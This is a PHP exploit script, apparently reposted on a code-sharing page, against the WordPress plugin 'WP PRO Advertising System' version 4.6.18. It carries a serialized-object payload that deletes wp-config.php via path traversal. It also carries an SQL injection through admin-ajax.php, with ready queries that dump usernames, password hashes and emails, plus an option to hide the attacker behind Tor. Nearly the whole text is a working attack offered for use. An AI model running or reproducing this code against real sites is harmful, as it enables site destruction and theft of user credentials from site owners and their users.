扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 |
<?php /** * Exploit Titie: WP PRO Advertising System - All In One Ad ManagerExploit * Google Dork: * Exploit Author: wp0Day.com <contact@wp0day.com> * Vendor Homepage: http://wordpress-advertising.com/ * Software Link: http://codecanyon.net/item/wp-pro-advertising-system-all-in-one-ad-manager/269693 * Version: 4.6.18 * Tested on: Debian 8, PHP 5.6.17-3 * Type: SQLi, Unserialize, File Delete. * Time line: Found [06-May-2016], Vendor notified [06-May-2016], Vendor fixed: [???], [RD:1464914936] */ require_once('curl.php'); //OR //include('https://raw.githubusercontent.com/svyatov/CurlWrapper/master/CurlWrapper.php'); $curl = new CurlWrapper(); $options = getopt("t:m:f:c:u:p:s:",array('tor:')); print_r($options); $options = validateInput($options); if (!$options){ showHelp(); } if ($options['tor'] === true) { echo " ### USING TOR ###\n"; echo "Setting TOR Proxy...\n"; $curl->addOption(CURLOPT_PROXY,"http://127.0.0.1:9150/"); $curl->addOption(CURLOPT_PROXYTYPE,7); echo "Checking IPv4 Address\n"; $curl->get('https://dynamicdns.park-your-domain.com/getip'); echo "Got IP : ".$curl->getResponse()."\n"; echo "Are you sure you want to do this?\nType 'wololo' to continue: "; $answer = fgets(fopen ("php://stdin","r")); if(trim($answer) != 'wololo'){ die("Aborting!\n"); } echo "OK...\n"; } class CPDF_Adapter{ private$_image_cache; public function set_file($file){ $this->_image_cache = array($file); } } function logIn(){ global $curl, $options; file_put_contents('cookies.txt',"\n"); $curl->setCookieFile('cookies.txt'); $curl->get($options['t']); $data = array('log'=>$options['u'], 'pwd'=>$options['p'], 'redirect_to'=>$options['t'], 'wp-submit'=>'Log In'); $curl->post($options['t'].'/wp-login.php', $data); $status =$curl->getTransferInfo('http_code'); if ($status !== 302){ echo "Login probably failed, aborting...\n"; echo "Login response saved to login.html.\n"; die(); } file_put_contents('login.html',$curl->getResponse()); } function exploit(){ global $curl, $options; if ($options['m'] == 'd'){ echo "Delete mode\n"; $pay_load_obj = new CPDF_Adapter(); $pay_load_obj->set_file('../../../../../../wp-config.php', '../../../../../../wp-config.php' ); $pay_load = base64_encode(serialize(array($pay_load_obj))); $data = array('stats_pdf'=>'1', 'data'=>$pay_load); $curl->post($options['t'].'?'.http_build_query($data)); $resp = $curl->getResponse(); echo $resp; } else { echo "SQLi mode \n"; echo "Trying a longin...\n"; logIn(); echo "Running SQL in Inject mode: ".$options['s']."\n"; $pay_load = array('action'=>'load_stats', 'group'=>'1=1 UNION ALL SELECT ('.$options['s'].') LIMIT 1,1# ', 'group_id'=>'1', 'rid'=>1); $curl->post($options['t'].'/wp-admin/admin-ajax.php', $pay_load); $resp = $curl->getResponse(); //Grab the output if (preg_match('~<div class="am_data">(.*?)(?:</div)~', $resp, $mat)){ if (isset($mat[1])){ echo "Response:\n".$mat[1]."\n"; die("Done\n"); } } echo "Failed getting SQLi response, response saved to resp.html\n"; file_put_contents('resp.html', $resp); } } exploit(); function validateInput($options){ if ( !isset($options['t']) || !filter_var($options['t'], FILTER_VALIDATE_URL) ){ return false; } if (!preg_match('~/$~',$options['t'])){ $options['t'] = $options['t'].'/'; } if (!isset($options['m']) || !in_array($options['m'], array('d','s') ) ){ return false; } if ($options['m'] == 's' && (!isset($options['u'])|| !isset($options['p']) || !isset($options['s'])) ){ return false; } $options['tor'] = isset($options['tor']); return $options; } function showHelp(){ global $argv; $help = <<<EOD WP PRO Advertising System - All In One Ad Manager Expoit Pack Usage: php $argv[0] -t [TARGET URL] --tor [USE TOR?] -u [USER] -p [password] -m [MODE]-s [SQL] *** In order to use the SQLi part you need an advertiser login ** [TARGET_URL] http://localhost/wordpress/ [MODE] d - Delete wp-config.php s - SQL Injection [TOR] Use tor network? (Connects to 127.0.0.1:9150) Note: In SQLi mode, you can't use ' or ", and you are in a subselect. To get all users and passwords you would do : SELECT concat(user_login,0x3a,user_pass,0x3a,user_email)FROM wp_users LIMIT 1 SELECT concat(user_login,0x3a,user_pass)FROM wp_users LIMIT 1,1 SELECT concat(user_login,0x3a,user_pass)FROM wp_users LIMIT 2,1 Examples: php $argv[0] -t http://localhost/wordpress --tor=yes -u user -p password -m d // Try to delete some files php $argv[0] -t http://localhost/wordpress -u user -p password -m s -s 'SELECT concat(user_login,0x3a,user_pass,0x3a,user_email)FROM wp_users LIMIT 1' Misc: CURL Wrapper by Leonid Svyatov <leonid@svyatov.ru> @link http://github.com/svyatov/CurlWrapper @license http://www.opensource.org/licenses/mit-license.html MIT License EOD; echo $help."\n\n"; die(); } |
体验盒子
